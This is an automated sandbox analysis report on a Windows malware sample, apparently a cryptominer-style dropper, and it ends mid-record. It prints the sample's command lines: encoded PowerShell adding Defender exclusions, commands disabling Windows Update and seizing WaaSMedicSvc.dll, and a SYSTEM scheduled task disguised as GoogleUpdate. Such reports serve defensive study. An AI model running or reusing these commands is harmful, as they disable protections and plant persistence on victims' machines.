7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442

Analysis

max time kernel
300s
max time network
46s
platform
windows7_x64
resource
win7-20220414-en
submitted
26-04-2022 22:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe
Size

2.2MB
MD5

40caa9b00badca24594571e157a6d2a9
SHA1

42f2faf2aa59f38c16824eaa1dc022fddb142565
SHA256

7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442
SHA512

e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

services.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" services.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2008 created 416 2008 powershell.EXE winlogon.exe
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1988 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2008 takeown.exe
468 icacls.exe
1396 takeown.exe
2032 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

2020 cmd.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2008 takeown.exe
468 icacls.exe
1396 takeown.exe
2032 icacls.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4"	services.exe

description	pid	process	target process
PID 2008 created 416	2008	powershell.EXE	winlogon.exe

pid	process
1988	updater.exe

pid	process
2008	takeown.exe
468	icacls.exe
1396	takeown.exe
2032	icacls.exe

pid	process
2020	cmd.exe

pid	process
2008	takeown.exe
468	icacls.exe
1396	takeown.exe
2032	icacls.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

conhost.exepowershell.EXEconhost.exe

description	pid	process	target process
PID 1924 set thread context of 1684	1924	conhost.exe	conhost.exe
PID 2008 set thread context of 1600	2008	powershell.EXE	dllhost.exe
PID 1952 set thread context of 1912	1952	conhost.exe	conhost.exe

Drops file in Windows directory 5 IoCs

Processes:

conhost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

520 schtasks.exe

pid	process
520	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0972d7dbb59d801	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.execonhost.exepowershell.EXEdllhost.exepowershell.EXEpowershell.execonhost.exe

pid	process
1268	powershell.exe
1924	conhost.exe
2008	powershell.EXE
2008	powershell.EXE
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
892	powershell.EXE
1784	powershell.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1952	conhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1204 Explorer.EXE

pid	process
1204	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowershell.EXEdllhost.exepowershell.EXEsvchost.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeShutdownPrivilege	1240	powercfg.exe
Token: SeShutdownPrivilege	992	powercfg.exe
Token: SeShutdownPrivilege	1952	powercfg.exe
Token: SeShutdownPrivilege	1912	powercfg.exe
Token: SeDebugPrivilege	1924	conhost.exe
Token: SeDebugPrivilege	2008	powershell.EXE
Token: SeDebugPrivilege	2008	powershell.EXE
Token: SeDebugPrivilege	1600	dllhost.exe
Token: SeDebugPrivilege	892	powershell.EXE
Token: SeAuditPrivilege	868	svchost.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1952	conhost.exe
Token: SeShutdownPrivilege	280	powercfg.exe
Token: SeShutdownPrivilege	1972	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	628	powercfg.exe
Token: SeShutdownPrivilege	1488	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.execonhost.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1256 wrote to memory of 1924	1256	7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe	conhost.exe
PID 1256 wrote to memory of 1924	1256	7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe	conhost.exe
PID 1256 wrote to memory of 1924	1256	7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe	conhost.exe
PID 1256 wrote to memory of 1924	1256	7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe	conhost.exe
PID 1924 wrote to memory of 1740	1924	conhost.exe	cmd.exe
PID 1924 wrote to memory of 1740	1924	conhost.exe	cmd.exe
PID 1924 wrote to memory of 1740	1924	conhost.exe	cmd.exe
PID 1740 wrote to memory of 1268	1740	cmd.exe	powershell.exe
PID 1740 wrote to memory of 1268	1740	cmd.exe	powershell.exe
PID 1740 wrote to memory of 1268	1740	cmd.exe	powershell.exe
PID 1924 wrote to memory of 268	1924	conhost.exe	cmd.exe
PID 1924 wrote to memory of 268	1924	conhost.exe	cmd.exe
PID 1924 wrote to memory of 268	1924	conhost.exe	cmd.exe
PID 1924 wrote to memory of 1196	1924	conhost.exe	cmd.exe
PID 1924 wrote to memory of 1196	1924	conhost.exe	cmd.exe
PID 1924 wrote to memory of 1196	1924	conhost.exe	cmd.exe
PID 268 wrote to memory of 1012	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1012	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1012	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1116	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1116	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1116	268	cmd.exe	sc.exe
PID 1196 wrote to memory of 1240	1196	cmd.exe	powercfg.exe
PID 1196 wrote to memory of 1240	1196	cmd.exe	powercfg.exe
PID 1196 wrote to memory of 1240	1196	cmd.exe	powercfg.exe
PID 268 wrote to memory of 676	268	cmd.exe	sc.exe
PID 268 wrote to memory of 676	268	cmd.exe	sc.exe
PID 268 wrote to memory of 676	268	cmd.exe	sc.exe
PID 268 wrote to memory of 280	268	cmd.exe	sc.exe
PID 268 wrote to memory of 280	268	cmd.exe	sc.exe
PID 268 wrote to memory of 280	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1972	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1972	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1972	268	cmd.exe	sc.exe
PID 1196 wrote to memory of 992	1196	cmd.exe	powercfg.exe
PID 1196 wrote to memory of 992	1196	cmd.exe	powercfg.exe
PID 1196 wrote to memory of 992	1196	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1536	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1536	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1536	268	cmd.exe	sc.exe
PID 1196 wrote to memory of 1952	1196	cmd.exe	powercfg.exe
PID 1196 wrote to memory of 1952	1196	cmd.exe	powercfg.exe
PID 1196 wrote to memory of 1952	1196	cmd.exe	powercfg.exe
PID 1196 wrote to memory of 1912	1196	cmd.exe	powercfg.exe
PID 1196 wrote to memory of 1912	1196	cmd.exe	powercfg.exe
PID 1196 wrote to memory of 1912	1196	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1044	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1044	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1044	268	cmd.exe	sc.exe
PID 1924 wrote to memory of 1684	1924	conhost.exe	conhost.exe
PID 1924 wrote to memory of 1684	1924	conhost.exe	conhost.exe
PID 1924 wrote to memory of 1684	1924	conhost.exe	conhost.exe
PID 1924 wrote to memory of 1684	1924	conhost.exe	conhost.exe
PID 268 wrote to memory of 1040	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1040	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1040	268	cmd.exe	sc.exe
PID 1924 wrote to memory of 1684	1924	conhost.exe	conhost.exe
PID 1924 wrote to memory of 1684	1924	conhost.exe	conhost.exe
PID 1924 wrote to memory of 1684	1924	conhost.exe	conhost.exe
PID 1924 wrote to memory of 1684	1924	conhost.exe	conhost.exe
PID 268 wrote to memory of 1488	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1488	268	cmd.exe	sc.exe
PID 268 wrote to memory of 1488	268	cmd.exe	sc.exe
PID 1924 wrote to memory of 1684	1924	conhost.exe	conhost.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Modifies security service
PID:460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:868

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
3⤵
PID:1800

C:\Windows\system32\taskeng.exe
taskeng.exe {2E719896-2A50-46A5-BF5B-3053002FCA69} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
PID:584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:892

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1108

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1080

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:576

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7bccc97f-59e6-4c9a-82bc-cb3ddde4555f}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1204

C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe
"C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1256

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe"
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="
4⤵
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
PID:1012

C:\Windows\system32\sc.exe
sc stop bits
5⤵
PID:1116

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
PID:676

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
PID:280

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
PID:1972

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:1536

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:1044

C:\Windows\system32\sc.exe
sc config bits start= disabled
5⤵
PID:1040

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
5⤵
PID:1488

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
5⤵
PID:1572

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
5⤵
PID:860

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
5⤵
PID:684

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
5⤵
PID:1356

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:1600

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:816

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1396

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2032

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
5⤵
PID:1116

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
5⤵
PID:1860

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
PID:676

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
PID:1788

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
PID:732

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
PID:2004

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
5⤵
PID:1960

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
5⤵
PID:1980

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
5⤵
PID:1796

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
5⤵
PID:1536

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
5⤵
PID:1912

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1432

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:2028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:1196

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:992

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
- Drops file in Windows directory
PID:1684

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
4⤵
PID:1304

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
5⤵
- Creates scheduled task(s)
PID:520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
4⤵
- Loads dropped DLL
PID:2020

C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
5⤵
- Executes dropped EXE
PID:1988

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"
6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="
7⤵
PID:1196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
